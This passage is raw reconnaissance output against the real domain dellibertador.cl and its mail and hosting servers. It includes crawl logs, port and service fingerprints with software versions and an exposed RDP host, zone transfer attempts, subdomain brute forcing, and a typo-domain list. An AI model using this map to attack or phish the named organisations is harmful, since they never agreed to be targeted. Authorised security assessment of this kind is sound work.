1148 + Crawling http://ftp.dellibertador.cl./img/plesk-guides.svg (File! Not crawling it.)
1149 + Crawling http://ftp.dellibertador.cl./img/knowlede-base.svg (File! Not crawling it.)
1150 + Crawling http://ftp.dellibertador.cl./img/forum.svg (File! Not crawling it.)
1151 + Crawling http://ftp.dellibertador.cl./img/developers-blog.svg (File! Not crawling it.)
1152 + Crawling http://ftp.dellibertador.cl./img/video-guides.svg (File! Not crawling it.)
1153 + Crawling http://ftp.dellibertador.cl./img/facebook.svg (File! Not crawling it.)
1154 + Searching for directories...
1155 - Found: http://ftp.dellibertador.cl./img/
1156 + Searching open folders...
1157 - http://ftp.dellibertador.cl./img/ (403 Forbidden)
1158
1159
1160 + URL to crawl: https://mail.dellibertador.cl.
1161 + Date: 2020-03-12
1162
1163 + Crawling URL: https://mail.dellibertador.cl.:
1164 + Links:
1165 + Crawling https://mail.dellibertador.cl.
1166 + Searching for directories...
1167 + Searching open folders...
1168
1169
1170 + URL to crawl: https://ns.dellibertador.cl
1171 + Date: 2020-03-12
1172
1173 + Crawling URL: https://ns.dellibertador.cl:
1174 + Links:
1175 + Crawling https://ns.dellibertador.cl
1176 + Searching for directories...
1177 + Searching open folders...
1178
1179
1180 + URL to crawl: https://ns.dellibertador.cl.
1181 + Date: 2020-03-12
1182
1183 + Crawling URL: https://ns.dellibertador.cl.:
1184 + Links:
1185 + Crawling https://ns.dellibertador.cl.
1186 + Searching for directories...
1187 + Searching open folders...
1188
1189
1190 + URL to crawl: https://webmail.dellibertador.cl.
1191 + Date: 2020-03-12
1192
1193 + Crawling URL: https://webmail.dellibertador.cl.:
1194 + Links:
1195 + Crawling https://webmail.dellibertador.cl.
1196 + Searching for directories...
1197 + Searching open folders...
1198
1199
1200 + URL to crawl: https://www.dellibertador.cl.
1201 + Date: 2020-03-12
1202
1203 + Crawling URL: https://www.dellibertador.cl.:
1204 + Links:
1205 + Crawling https://www.dellibertador.cl.
1206 + Searching for directories...
1207 + Searching open folders...
1208
1209
1210 + URL to crawl: https://ftp.dellibertador.cl.
1211 + Date: 2020-03-12
1212
1213 + Crawling URL: https://ftp.dellibertador.cl.:
1214 + Links:
1215 + Crawling https://ftp.dellibertador.cl.
1216 + Searching for directories...
1217 + Searching open folders...
1218
1219
1220 + URL to crawl: http://mail.dellibertador.cl.:8443
1221 + Date: 2020-03-12
1222
1223 + Crawling URL: http://mail.dellibertador.cl.:8443:
1224 + Links:
1225 + Crawling http://mail.dellibertador.cl.:8443
1226 + Searching for directories...
1227 + Searching open folders...
1228
1229
1230 + URL to crawl: http://ns.dellibertador.cl:8443
1231 + Date: 2020-03-12
1232
1233 + Crawling URL: http://ns.dellibertador.cl:8443:
1234 + Links:
1235 + Crawling http://ns.dellibertador.cl:8443
1236 + Searching for directories...
1237 + Searching open folders...
1238
1239
1240 + URL to crawl: http://ns.dellibertador.cl.:8443
1241 + Date: 2020-03-12
1242
1243 + Crawling URL: http://ns.dellibertador.cl.:8443:
1244 + Links:
1245 + Crawling http://ns.dellibertador.cl.:8443
1246 + Searching for directories...
1247 + Searching open folders...
1248
1249
1250 + URL to crawl: http://webmail.dellibertador.cl.:8443
1251 + Date: 2020-03-12
1252
1253 + Crawling URL: http://webmail.dellibertador.cl.:8443:
1254 + Links:
1255 + Crawling http://webmail.dellibertador.cl.:8443
1256 + Searching for directories...
1257 + Searching open folders...
1258
1259
1260 + URL to crawl: http://www.dellibertador.cl.:8443
1261 + Date: 2020-03-12
1262
1263 + Crawling URL: http://www.dellibertador.cl.:8443:
1264 + Links:
1265 + Crawling http://www.dellibertador.cl.:8443
1266 + Searching for directories...
1267 + Searching open folders...
1268
1269
1270 + URL to crawl: http://ftp.dellibertador.cl.:8443
1271 + Date: 2020-03-12
1272
1273 + Crawling URL: http://ftp.dellibertador.cl.:8443:
1274 + Links:
1275 + Crawling http://ftp.dellibertador.cl.:8443
1276 + Searching for directories...
1277 + Searching open folders...
1278
1279--Finished--
1280Summary information for domain dellibertador.cl.
1281-----------------------------------------
1282
1283 Domain Ips Information:
1284 IP: 200.7.5.7
1285 HostName: secundario.nic.cl Type: NS
1286 HostName: secundario.nic.cl Type: PTR
1287 Country: Chile
1288 Is Active: True (echo-reply ttl 46)
1289 Port: 53/tcp open domain syn-ack ttl 46 (unknown banner: BIND 9)
1290 Script Info: | dns-nsid:
1291 Script Info: | NSID: sec-blanco (7365632d626c616e636f)
1292 Script Info: | id.server: sec-blanco
1293 Script Info: |_ bind.version: BIND 9
1294 Script Info: | fingerprint-strings:
1295 Script Info: | DNSVersionBindReqTCP:
1296 Script Info: | version
1297 Script Info: | bind
1298 Script Info: |_ BIND 9
1299 IP: 200.54.230.252
1300 HostName: magic-02.tdata.cloud Type: MX
1301 HostName: magic-02.tdata.cloud Type: PTR
1302 Country: Chile
1303 Is Active: True (syn-ack ttl 42)
1304 Port: 25/tcp open smtp syn-ack ttl 42 Exim smtpd
1305 Script Info: | smtp-commands: magic-02.tdata.cloud Hello nmap.scanme.org [84.17.52.67], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
1306 Script Info: |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
1307 Script Info: | ssl-cert: Subject: commonName=mailcleaner/organizationName=MailCleaner/stateOrProvinceName=Vaud/countryName=CH
1308 Script Info: | Issuer: commonName=mailcleaner/organizationName=MailCleaner/stateOrProvinceName=Vaud/countryName=CH
1309 Script Info: | Public Key type: rsa
1310 Script Info: | Public Key bits: 1024
1311 Script Info: | Signature Algorithm: md5WithRSAEncryption
1312 Script Info: | Not valid before: 2007-01-12T10:04:42
1313 Script Info: | Not valid after: 2034-05-29T10:04:42
1314 Script Info: | MD5: 9538 8856 60b9 3192 64e0 ec2a 6b84 5b63
1315 Script Info: |_SHA-1: ef7c 297c cc5a 971d 8dcb dae9 ba62 f8ed f96c f3ea
1316 Script Info: |_ssl-date: TLS randomness does not represent time
1317 Port: 3389/tcp open ms-wbt-server syn-ack ttl 106 Microsoft Terminal Services
1318 Script Info: | rdp-ntlm-info:
1319 Script Info: | Target_Name: GOREOHIGGINS
1320 Script Info: | NetBIOS_Domain_Name: GOREOHIGGINS
1321 Script Info: | NetBIOS_Computer_Name: TDATA-RD-01
1322 Script Info: | DNS_Domain_Name: goreohiggins.cl
1323 Script Info: | DNS_Computer_Name: tdata-rd-01.goreohiggins.cl
1324 Script Info: | DNS_Tree_Name: goreohiggins.cl
1325 Script Info: | Product_Version: 10.0.14393
1326 Script Info: |_ System_Time: 2020-03-12T20:44:42+00:00
1327 Script Info: | ssl-cert: Subject: commonName=tdata-rd-01.goreohiggins.cl
1328 Script Info: | Issuer: commonName=tdata-rd-01.goreohiggins.cl
1329 Script Info: | Public Key type: rsa
1330 Script Info: | Public Key bits: 2048
1331 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1332 Script Info: | Not valid before: 2019-11-29T14:46:45
1333 Script Info: | Not valid after: 2020-05-30T14:46:45
1334 Script Info: | MD5: 836b a227 936d d44f 0978 fd47 7459 836b
1335 Script Info: |_SHA-1: ead1 5c03 26ce e9f8 68b8 eea9 f886 01d3 d39c 4178
1336 Script Info: |_ssl-date: 2020-03-12T20:44:47+00:00; -5s from scanner time.
1337 Script Info: Running (JUST GUESSING): Linux 3.X|4.X (90%)
1338 Os Info: OS: Windows; CPE: cpe:/o:microsoft:windows
1339 Script Info: |_clock-skew: mean: -5s, deviation: 0s, median: -5s
1340 IP: 200.54.230.251
1341 HostName: magic-01.tdata.cloud Type: MX
1342 HostName: magic-01.tdata.cloud Type: PTR
1343 Country: Chile
1344 Is Active: True (syn-ack ttl 42)
1345 Port: 25/tcp open smtp syn-ack ttl 42 Exim smtpd
1346 Script Info: | smtp-commands: magic-02.tdata.cloud Hello nmap.scanme.org [84.17.52.67], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
1347 Script Info: |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
1348 Script Info: | ssl-cert: Subject: commonName=mailcleaner/organizationName=MailCleaner/stateOrProvinceName=Vaud/countryName=CH
1349 Script Info: | Issuer: commonName=mailcleaner/organizationName=MailCleaner/stateOrProvinceName=Vaud/countryName=CH
1350 Script Info: | Public Key type: rsa
1351 Script Info: | Public Key bits: 1024
1352 Script Info: | Signature Algorithm: md5WithRSAEncryption
1353 Script Info: | Not valid before: 2007-01-12T10:04:42
1354 Script Info: | Not valid after: 2034-05-29T10:04:42
1355 Script Info: | MD5: 9538 8856 60b9 3192 64e0 ec2a 6b84 5b63
1356 Script Info: |_SHA-1: ef7c 297c cc5a 971d 8dcb dae9 ba62 f8ed f96c f3ea
1357 Script Info: |_ssl-date: TLS randomness does not represent time
1358 Script Info: Running (JUST GUESSING): Linux 3.X|4.X (89%)
1359 IP: 200.54.230.247
1360 HostName: ns.dellibertador.cl Type: NS
1361 HostName: plesk.tdata.cloud Type: PTR
1362 HostName: www.dellibertador.cl. Type: A
1363 HostName: ftp.dellibertador.cl. Type: A
1364 HostName: mail.dellibertador.cl. Type: A
1365 HostName: ns.dellibertador.cl. Type: A
1366 HostName: webmail.dellibertador.cl. Type: A
1367 Country: Chile
1368 Is Active: True (syn-ack ttl 43)
1369 Port: 21/tcp open ftp syn-ack ttl 43 ProFTPD
1370 Script Info: | ssl-cert: Subject: commonName=plesk.tdata.cloud
1371 Script Info: | Subject Alternative Name: DNS:plesk.tdata.cloud
1372 Script Info: | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
1373 Script Info: | Public Key type: rsa
1374 Script Info: | Public Key bits: 2048
1375 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1376 Script Info: | Not valid before: 2020-01-28T15:44:32
1377 Script Info: | Not valid after: 2020-04-27T15:44:32
1378 Script Info: | MD5: 5d90 a140 df99 3a53 7a93 d5d5 e65f 5048
1379 Script Info: |_SHA-1: 70b9 0399 6aeb dd28 4a52 f213 1ea1 7dea 8587 d085
1380 Script Info: |_ssl-date: TLS randomness does not represent time
1381 Script Info: | tls-alpn:
1382 Script Info: |_ ftp
1383 Script Info: | tls-nextprotoneg:
1384 Script Info: |_ ftp
1385 Port: 22/tcp open ssh syn-ack ttl 43 OpenSSH 7.4 (protocol 2.0)
1386 Script Info: | ssh-hostkey:
1387 Script Info: | 2048 a2:d5:9a:d1:54:5e:c6:d6:73:ff:76:5b:77:30:88:90 (RSA)
1388 Script Info: | 256 6a:1d:91:55:77:cb:45:e2:a4:90:53:35:d4:d0:36:7f (ECDSA)
1389 Script Info: |_ 256 68:99:17:75:71:2b:70:19:1b:0a:b3:45:38:da:71:63 (ED25519)
1390 Port: 25/tcp open smtp syn-ack ttl 43 Postfix smtpd
1391 Script Info: |_smtp-commands: plesk.tdata.cloud, PIPELINING, SIZE 42188800, ETRN, STARTTLS, AUTH DIGEST-MD5 CRAM-MD5 PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
1392 Script Info: | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
1393 Script Info: | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
1394 Script Info: | Public Key type: rsa
1395 Script Info: | Public Key bits: 2048
1396 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1397 Script Info: | Not valid before: 2019-11-29T14:59:31
1398 Script Info: | Not valid after: 2020-11-28T14:59:31
1399 Script Info: | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
1400 Script Info: |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
1401 Script Info: |_ssl-date: TLS randomness does not represent time
1402 Port: 53/tcp open domain syn-ack ttl 43 (unknown banner: none)
1403 Script Info: | dns-nsid:
1404 Script Info: |_ bind.version: none
1405 Script Info: | fingerprint-strings:
1406 Script Info: | DNSVersionBindReqTCP:
1407 Script Info: | version
1408 Script Info: | bind
1409 Script Info: |_ none
1410 Port: 80/tcp open http syn-ack ttl 43 nginx
1411 Script Info: |_http-favicon: Parallels Plesk
1412 Script Info: | http-methods:
1413 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1414 Script Info: |_http-title: Web Server's Default Page
1415 Port: 110/tcp open pop3 syn-ack ttl 43 Dovecot pop3d
1416 Script Info: |_pop3-capabilities: SASL(PLAIN LOGIN CRAM-MD5) TOP RESP-CODES USER AUTH-RESP-CODE APOP STLS CAPA PIPELINING UIDL
1417 Script Info: | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
1418 Script Info: | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
1419 Script Info: | Public Key type: rsa
1420 Script Info: | Public Key bits: 2048
1421 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1422 Script Info: | Not valid before: 2019-11-29T14:59:31
1423 Script Info: | Not valid after: 2020-11-28T14:59:31
1424 Script Info: | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
1425 Script Info: |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
1426 Script Info: |_ssl-date: TLS randomness does not represent time
1427 Port: 143/tcp open imap syn-ack ttl 43 Dovecot imapd
1428 Script Info: |_imap-capabilities: more LITERAL+ ENABLE post-login LOGIN-REFERRALS STARTTLS ID IDLE capabilities SASL-IR OK have AUTH=PLAIN listed AUTH=LOGIN AUTH=CRAM-MD5A0001 Pre-login IMAP4rev1
1429 Script Info: | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
1430 Script Info: | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
1431 Script Info: | Public Key type: rsa
1432 Script Info: | Public Key bits: 2048
1433 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1434 Script Info: | Not valid before: 2019-11-29T14:59:31
1435 Script Info: | Not valid after: 2020-11-28T14:59:31
1436 Script Info: | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
1437 Script Info: |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
1438 Script Info: |_ssl-date: TLS randomness does not represent time
1439 Port: 443/tcp open ssl/http syn-ack ttl 43 nginx
1440 Script Info: |_http-favicon: Parallels Plesk
1441 Script Info: | http-methods:
1442 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1443 Script Info: | http-robots.txt: 1 disallowed entry
1444 Script Info: |_/
1445 Script Info: |_http-title: Plesk Obsidian 18.0.24
1446 Script Info: | ssl-cert: Subject: commonName=plesk.tdata.cloud
1447 Script Info: | Subject Alternative Name: DNS:plesk.tdata.cloud
1448 Script Info: | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
1449 Script Info: | Public Key type: rsa
1450 Script Info: | Public Key bits: 2048
1451 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1452 Script Info: | Not valid before: 2020-01-28T15:44:32
1453 Script Info: | Not valid after: 2020-04-27T15:44:32
1454 Script Info: | MD5: 5d90 a140 df99 3a53 7a93 d5d5 e65f 5048
1455 Script Info: |_SHA-1: 70b9 0399 6aeb dd28 4a52 f213 1ea1 7dea 8587 d085
1456 Script Info: |_ssl-date: TLS randomness does not represent time
1457 Script Info: | tls-alpn:
1458 Script Info: | h2
1459 Script Info: |_ http/1.1
1460 Script Info: | tls-nextprotoneg:
1461 Script Info: | h2
1462 Script Info: |_ http/1.1
1463 Port: 465/tcp open ssl/smtp syn-ack ttl 43 Postfix smtpd
1464 Script Info: |_smtp-commands: Couldn't establish connection on port 465
1465 Script Info: | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
1466 Script Info: | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
1467 Script Info: | Public Key type: rsa
1468 Script Info: | Public Key bits: 2048
1469 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1470 Script Info: | Not valid before: 2019-11-29T14:59:31
1471 Script Info: | Not valid after: 2020-11-28T14:59:31
1472 Script Info: | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
1473 Script Info: |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
1474 Script Info: |_ssl-date: TLS randomness does not represent time
1475 Port: 587/tcp open smtp syn-ack ttl 43 Postfix smtpd
1476 Script Info: |_smtp-commands: plesk.tdata.cloud, PIPELINING, SIZE 42188800, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
1477 Script Info: | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
1478 Script Info: | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
1479 Script Info: | Public Key type: rsa
1480 Script Info: | Public Key bits: 2048
1481 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1482 Script Info: | Not valid before: 2019-11-29T14:59:31
1483 Script Info: | Not valid after: 2020-11-28T14:59:31
1484 Script Info: | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
1485 Script Info: |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
1486 Script Info: |_ssl-date: TLS randomness does not represent time
1487 Port: 993/tcp open ssl/imap syn-ack ttl 43 Dovecot imapd
1488 Script Info: |_imap-capabilities: more LITERAL+ ENABLE post-login IMAP4rev1 ID IDLE capabilities SASL-IR OK have listed LOGIN-REFERRALS AUTH=LOGIN AUTH=CRAM-MD5A0001 Pre-login AUTH=PLAIN
1489 Script Info: | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
1490 Script Info: | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
1491 Script Info: | Public Key type: rsa
1492 Script Info: | Public Key bits: 2048
1493 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1494 Script Info: | Not valid before: 2019-11-29T14:59:31
1495 Script Info: | Not valid after: 2020-11-28T14:59:31
1496 Script Info: | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
1497 Script Info: |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
1498 Script Info: |_ssl-date: TLS randomness does not represent time
1499 Port: 995/tcp open ssl/pop3 syn-ack ttl 43 Dovecot pop3d
1500 Script Info: |_pop3-capabilities: SASL(PLAIN LOGIN CRAM-MD5) TOP RESP-CODES USER AUTH-RESP-CODE APOP CAPA PIPELINING UIDL
1501 Script Info: | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
1502 Script Info: | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
1503 Script Info: | Public Key type: rsa
1504 Script Info: | Public Key bits: 2048
1505 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1506 Script Info: | Not valid before: 2019-11-29T14:59:31
1507 Script Info: | Not valid after: 2020-11-28T14:59:31
1508 Script Info: | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
1509 Script Info: |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
1510 Script Info: |_ssl-date: TLS randomness does not represent time
1511 Port: 8443/tcp open ssl/https-alt syn-ack ttl 43 sw-cp-server
1512 Script Info: | fingerprint-strings:
1513 Script Info: | GetRequest:
1514 Script Info: | HTTP/1.1 200 OK
1515 Script Info: | Server: sw-cp-server
1516 Script Info: | Date: Thu, 12 Mar 2020 20:46:01 GMT
1517 Script Info: | Content-Type: text/html; charset=UTF-8
1518 Script Info: | Connection: close
1519 Script Info: | Expires: Fri, 28 May 1999 00:00:00 GMT
1520 Script Info: | Last-Modified: Thu, 12 Mar 2020 20:46:01 GMT
1521 Script Info: | Cache-Control: no-store, no-cache, must-revalidate
1522 Script Info: | Cache-Control: post-check=0, pre-check=0
1523 Script Info: | Pragma: no-cache
1524 Script Info: | P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
1525 Script Info: | X-Frame-Options: SAMEORIGIN
1526 Script Info: | X-XSS-Protection: 1; mode=block
1527 Script Info: | <html><head>
1528 Script Info: | <meta charset="utf-8">
1529 Script Info: | <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
1530 Script Info: | <meta name="plesk-build" content="1800200215.00">
1531 Script Info: | <title>Plesk Obsidian 18.0.24</title>
1532 Script Info: | <script language="javascript" type="text/javascript" src="/cp/javascript/externals/prototype.js?1581675273"/></script>
1533 Script Info: | </head><body onLoad=";top.location='/login.php?success_redirect_url=%2F';"></b
1534 Script Info: | HTTPOptions:
1535 Script Info: | HTTP/1.1 405 Not Allowed
1536 Script Info: | Server: sw-cp-server
1537 Script Info: | Date: Thu, 12 Mar 2020 20:46:03 GMT
1538 Script Info: | Content-Type: text/html
1539 Script Info: | Content-Length: 929
1540 Script Info: | Connection: close
1541 Script Info: | ETag: "5e46d8aa-3a1"
1542 Script Info: | <!DOCTYPE html>
1543 Script Info: | <html lang="en" dir="ltr">
1544 Script Info: | <head>
1545 Script Info: | <meta charset="utf-8">
1546 Script Info: | <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
1547 Script Info: | <title>405 Method Not Allowed</title>
1548 Script Info: | <link rel="shortcut icon" href="/favicon.ico">
1549 Script Info: | <link rel="stylesheet" href="/ui-library/plesk-ui-library.css?3.5.0">
1550 Script Info: | <script type="text/javascript" src="/ui-library/plesk-ui-library.min.js?3.5.0"></script>
1551 Script Info: | <script type="text/javascript" src="/cp/javascript/vendors.js"></script>
1552 Script Info: | <script type="text/javascript" src="/cp/javascript/main.js"></script>
1553 Script Info: | <script type="text/javascript" src="/error_docs/uat.js?v1"></script>
1554 Script Info: | <link href="/error_docs/app.css" rel="stylesheet"></head>
1555 Script Info: | <body>
1556 Script Info: |_ <div id="
1557 Script Info: | http-methods:
1558 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1559 Script Info: | http-robots.txt: 1 disallowed entry
1560 Script Info: |_/
1561 Script Info: |_http-server-header: sw-cp-server
1562 Script Info: |_http-title: Plesk Obsidian 18.0.24
1563 Script Info: | ssl-cert: Subject: commonName=plesk.tdata.cloud
1564 Script Info: | Subject Alternative Name: DNS:plesk.tdata.cloud
1565 Script Info: | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
1566 Script Info: | Public Key type: rsa
1567 Script Info: | Public Key bits: 2048
1568 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1569 Script Info: | Not valid before: 2020-01-28T15:44:32
1570 Script Info: | Not valid after: 2020-04-27T15:44:32
1571 Script Info: | MD5: 5d90 a140 df99 3a53 7a93 d5d5 e65f 5048
1572 Script Info: |_SHA-1: 70b9 0399 6aeb dd28 4a52 f213 1ea1 7dea 8587 d085
1573 Script Info: |_ssl-date: TLS randomness does not represent time
1574 Script Info: | tls-alpn:
1575 Script Info: |_ http/1.1
1576 Script Info: | tls-nextprotoneg:
1577 Script Info: |_ http/1.1
1578 Os Info: Hosts: plesk.tdata.cloud, plesk.tdata.cloud
1579
1580--------------End Summary --------------
1581-----------------------------------------
1582#####################################################################################################################################
1583----- dellibertador.cl -----
1584
1585
1586Host's addresses:
1587__________________
1588
1589dellibertador.cl. 86066 IN A 200.54.230.247
1590
1591
1592Name Servers:
1593______________
1594
1595secundario.nic.cl. 42865 IN A 200.7.5.7
1596ns.dellibertador.cl. 86065 IN A 200.54.230.247
1597
1598
1599Mail (MX) Servers:
1600___________________
1601
1602magic-02.tdata.cloud. 3271 IN A 200.54.230.252
1603magic-01.tdata.cloud. 3271 IN A 200.54.230.251
1604
1605
1606Trying Zone Transfers and getting Bind Versions:
1607_________________________________________________
1608
1609
1610Trying Zone Transfer for dellibertador.cl on ns.dellibertador.cl ...
1611AXFR record query failed: REFUSED
1612
1613Trying Zone Transfer for dellibertador.cl on secundario.nic.cl ...
1614AXFR record query failed: REFUSED
1615
1616
1617Scraping dellibertador.cl subdomains from Google:
1618__________________________________________________
1619
1620
1621 ---- Google search page: 1 ----
1622
1623 transparencia
1624 transparencia
1625 transparencia
1626 transparencia
1627 transparencia
1628 transparencia
1629 transparencia
1630 transparencia
1631
1632 ---- Google search page: 2 ----
1633
1634 transparencia
1635 transparencia
1636 transparencia
1637 transparencia
1638 transparencia
1639 transparencia
1640 transparencia
1641
1642
1643Google Results:
1644________________
1645
1646
1647
1648Brute forcing with /usr/share/dnsenum/dns.txt:
1649_______________________________________________
1650
1651ftp.dellibertador.cl. 86400 IN CNAME dellibertador.cl.
1652dellibertador.cl. 85995 IN A 200.54.230.247
1653mail.dellibertador.cl. 86400 IN A 200.54.230.247
1654ns.dellibertador.cl. 85946 IN A 200.54.230.247
1655webmail.dellibertador.cl. 86400 IN A 200.54.230.247
1656www.dellibertador.cl. 86400 IN CNAME dellibertador.cl.
1657dellibertador.cl. 85886 IN A 200.54.230.247
1658
1659
1660Launching Whois Queries:
1661_________________________
1662
1663 whois ip result: 200.54.230.0 -> 200.54.230.0/24
1664
1665
1666dellibertador.cl________________
1667
1668 200.54.230.0/24
1669######################################################################################################################################
1670dnsenum VERSION:1.2.6
1671
1672----- www.dellibertador.cl -----
1673
1674
1675Host's addresses:
1676__________________
1677
1678dellibertador.cl. 86397 IN A 200.54.230.247
1679
1680
1681Name Servers:
1682______________
1683
1684secundario.nic.cl. 43195 IN A 200.7.5.7
1685ns.dellibertador.cl. 86395 IN A 200.54.230.247
1686
1687
1688Mail (MX) Servers:
1689___________________
1690
1691magic-02.tdata.cloud. 3600 IN A 200.54.230.252
1692magic-01.tdata.cloud. 3600 IN A 200.54.230.251
1693
1694
1695Trying Zone Transfers and getting Bind Versions:
1696_________________________________________________
1697
1698
1699Trying Zone Transfer for www.dellibertador.cl on secundario.nic.cl ...
1700
1701Trying Zone Transfer for www.dellibertador.cl on ns.dellibertador.cl ...
1702
1703
1704Brute forcing with /usr/share/sniper/wordlists/vhosts.txt:
1705___________________________________________________________
1706
1707
1708
1709www.dellibertador.cl class C netranges:
1710________________________________________
1711
1712
1713
1714www.dellibertador.cl ip blocks:
1715________________________________
1716
1717 /32
1718
1719done.
1720#####################################################################################################################################
1721URLCrazy Domain Report
1722Domain : www.dellibertador.cl
1723Keyboard : qwerty
1724At : 2020-03-12 16:40:33 -0400
1725
1726# Please wait. 232 hostnames to process
1727
1728Typo Type Typo DNS-A CC-A DNS-MX Extn
1729----------------------------------------------------------------------------------------------------------------------
1730Character Omission ww.dellibertador.cl ? cl
1731Character Omission www.delibertador.cl ? cl
1732Character Omission www.dellbertador.cl ? cl
1733Character Omission www.delliberador.cl ? cl
1734Character Omission www.dellibertado.cl ? cl
1735Character Omission www.dellibertadr.cl ? cl
1736Character Omission www.dellibertaor.cl ? cl
1737Character Omission www.dellibertdor.cl ? cl
1738Character Omission www.dellibetador.cl ? cl
1739Character Omission www.dellibrtador.cl ? cl
1740Character Omission www.delliertador.cl ? cl
1741Character Omission www.dllibertador.cl ? cl
1742Character Omission www.ellibertador.cl 201.159.169.238 ellibertador.cl cl
1743Character Omission wwwdellibertador.cl ? cl
1744Character Repeat www.ddellibertador.cl ? cl
1745Character Repeat www.deellibertador.cl ? cl
1746Character Repeat www.dellibbertador.cl ? cl
1747Character Repeat www.dellibeertador.cl ? cl
1748Character Repeat www.delliberrtador.cl ? cl
1749Character Repeat www.dellibertaador.cl ? cl
1750Character Repeat www.dellibertaddor.cl ? cl
1751Character Repeat www.dellibertadoor.cl ? cl
1752Character Repeat www.dellibertadorr.cl ? cl
1753Character Repeat www.delliberttador.cl ? cl
1754Character Repeat www.delliibertador.cl ? cl
1755Character Repeat www.delllibertador.cl ? cl
1756Character Repeat wwww.dellibertador.cl ? cl
1757Character Swap ww.wdellibertador.cl ? cl
1758Character Swap www.delilbertador.cl ? cl
1759Character Swap www.dellbiertador.cl ? cl
1760Character Swap www.delliberatdor.cl ? cl
1761Character Swap www.dellibertador.lc ? lc
1762Character Swap www.dellibertadro.cl ? cl
1763Character Swap www.dellibertaodr.cl ? cl
1764Character Swap www.dellibertdaor.cl ? cl
1765Character Swap www.dellibetrador.cl ? cl
1766Character Swap www.dellibretador.cl ? cl
1767Character Swap www.delliebrtador.cl ? cl
1768Character Swap www.dlelibertador.cl ? cl
1769Character Swap www.edllibertador.cl ? cl
1770Character Swap wwwd.ellibertador.cl ? cl
1771Character Replacement eww.dellibertador.cl ? cl
1772Character Replacement qww.dellibertador.cl ? cl
1773Character Replacement wew.dellibertador.cl ? cl
1774Character Replacement wqw.dellibertador.cl ? cl
1775Character Replacement wwe.dellibertador.cl ? cl
1776Character Replacement wwq.dellibertador.cl ? cl
1777Character Replacement www.deklibertador.cl ? cl
1778Character Replacement www.delkibertador.cl ? cl
1779Character Replacement www.dellibeetador.cl ? cl
1780Character Replacement www.delliberrador.cl ? cl
1781Character Replacement www.dellibertadir.cl ? cl
1782Character Replacement www.dellibertadoe.cl ? cl
1783Character Replacement www.dellibertadot.cl ? cl
1784Character Replacement www.dellibertadpr.cl ? cl
1785Character Replacement www.dellibertafor.cl ? cl
1786Character Replacement www.dellibertasor.cl ? cl
1787Character Replacement www.dellibertsdor.cl ? cl
1788Character Replacement www.delliberyador.cl ? cl
1789Character Replacement www.dellibettador.cl ? cl
1790Character Replacement www.dellibrrtador.cl ? cl
1791Character Replacement www.dellibwrtador.cl ? cl
1792Character Replacement www.dellinertador.cl ? cl
1793Character Replacement www.dellivertador.cl ? cl
1794Character Replacement www.dellobertador.cl ? cl
1795Character Replacement www.dellubertador.cl ? cl
1796Character Replacement www.drllibertador.cl ? cl
1797Character Replacement www.dwllibertador.cl ? cl
1798Character Replacement www.fellibertador.cl ? cl
1799Character Replacement www.sellibertador.cl ? cl
